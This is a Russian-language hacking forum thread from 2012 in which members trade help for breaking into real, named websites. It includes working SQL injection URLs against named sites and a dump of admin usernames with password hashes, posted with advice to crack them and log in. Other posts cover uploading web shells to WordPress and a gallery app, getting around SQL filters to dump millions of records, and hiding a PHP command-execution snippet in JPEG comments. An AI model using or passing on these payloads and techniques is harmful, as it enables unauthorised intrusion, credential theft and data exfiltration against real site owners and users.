Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. anonym_di

    anonym_di Member

    Joined:
    21 Jan 2012
    Messages:
    55
    Likes Received:
    7
    Reputations:
    0
    Ребята помогите раскрутить эту скулю
    http://www.mk.gov.kz/?lang=kaz&id_open_rubric=361&page=7
     
  2. anonym_di

    anonym_di Member

    Joined:
    21 Jan 2012
    Messages:
    55
    Likes Received:
    7
    Reputations:
    0
    Данные правильные вот
    Code:
    1
    Admin 
    pusti 
    Администратор, 
     
    2 
    obz 
    zbo 
    ОБЖ
     
    #19362 anonym_di, 11 Feb 2012
    Last edited: 11 Feb 2012
  3. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    id_open_rubri - макс 5 символов
    page - подставляется в лимит, скули нету.
     
  4. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    2IVAN
    я же тебе писал не поленись перебери таблицы, если этот сайт для тебя важен,
    писал про таблицу mdl_user, вот что из туда выпало:
    http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,group_concat(0x3a,id,username,0x3a,password),3,4,5+from+u99526_moodle.mdl_user
    Code:
    ,:2admin:6c83c300238522d49d616550f45f9394,:3uraev:622694bd4f
    расшифруй и попробуй авторизоватся
     
    #19364 pirat0, 11 Feb 2012
    Last edited: 11 Feb 2012
    1 person likes this.
  5. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    просто он пишет что авторизоватся на сайте не может с теми даными что получил из таблицы lsh_infousers, я думаю стоит попробывать поискать записи юзверей в других таблицах, и как пример вытянул даные с таблицы mdl_user, где есть запись с login-admin, эту запись остается расшифровать и попробывать залогинится)))
     
  6. bodrich

    bodrich Member

    Joined:
    9 Jan 2012
    Messages:
    21
    Likes Received:
    7
    Reputations:
    0
    http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273--+
    А как здесь вытащить столбцы ?
     
  7. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    вариант №1
    http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,group_concat(column_name),3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x75736572+limit+0,1--+ (где в хексе user)
    вариант №2
    http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,group_concat(column_name),3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x62346d66715f7573657273+limit+0,1--+ (где в хексе b4mfq_users)
    p.s. таблички к которой ты составлял запрос походу нету (users), ну или я ее не нашол))
     
  8. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Ребят, из-за чего в MySQL скуле може НЕ РАБОТАТЬ where?
    Первый раз с таким сталкиваюсь. Любой запрос содержащий where не отрабатывает... Из-за чего может быть? Есть ли аналоги? Нужно сделать дамп примерно 2 000 000 записей. Лимит естественно ложит БД.

    p.s. фильтрации нету вроде ни на что. MySQL >=5
     
  9. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    фильтр. хотя слабо верится.
     
  10. Jakeroid

    Jakeroid Member

    Joined:
    9 May 2009
    Messages:
    199
    Likes Received:
    12
    Reputations:
    1
    Кто-то сталкивался с такой штукой как Plogger Gallery? Нужно через нее залить шел.

    Вот ссылка на сайт галереи:
    http://www.plogger.org/
     
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    твостер писал про рутовый шелл, который все команды из под суидника запускает. там r57 был, линк устарел, есть wso или c99?

    upd: нашел
     
    _________________________
    #19371 yarbabin, 13 Feb 2012
    Last edited: 13 Feb 2012
  12. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    /*!+where+*/ и тому подобные обходы не работают...
    Да и кроме WHERE тогда НИЧЕГО не фильтруется? Смысл?
     
  13. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Показывай ссылку.
     
  14. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    почитай тут может что получится,
    http://forum.antichat.ru/printthread.php?t=195037
    ps 3 пункт "Альтернатива where"
     
  15. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    как залить шелл в wp 3.2.1 ?
     
  16. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Шаблоны.
     
  17. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    Такой вопрос... если у меня есть пассивка, которая находится между тегов <script> </script>
    то выполнится ли код в браузерах с фильтром xss(chrome, ie8+)? протестить пока не могу
     
  18. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Угу.
     
  19. Киев

    Киев Banned

    Joined:
    9 Aug 2011
    Messages:
    19
    Likes Received:
    8
    Reputations:
    4
    Вопрос такой: есть возможность заливать картинки на сайт, но расширение и содержимое файла фильтруется, так вот помню читал где-то что при редактировании изображения можно дописать php код в какие-то теги. Не напомните что за способ? Или поделитесь другими методами обхода такой фильтрации
     
  20. Юго

    Юго Member

    Joined:
    2 Feb 2011
    Messages:
    0
    Likes Received:
    77
    Reputations:
    17
    В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать <?php system($cmd) ?> без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.
     
Thread Status:
Not open for further replies.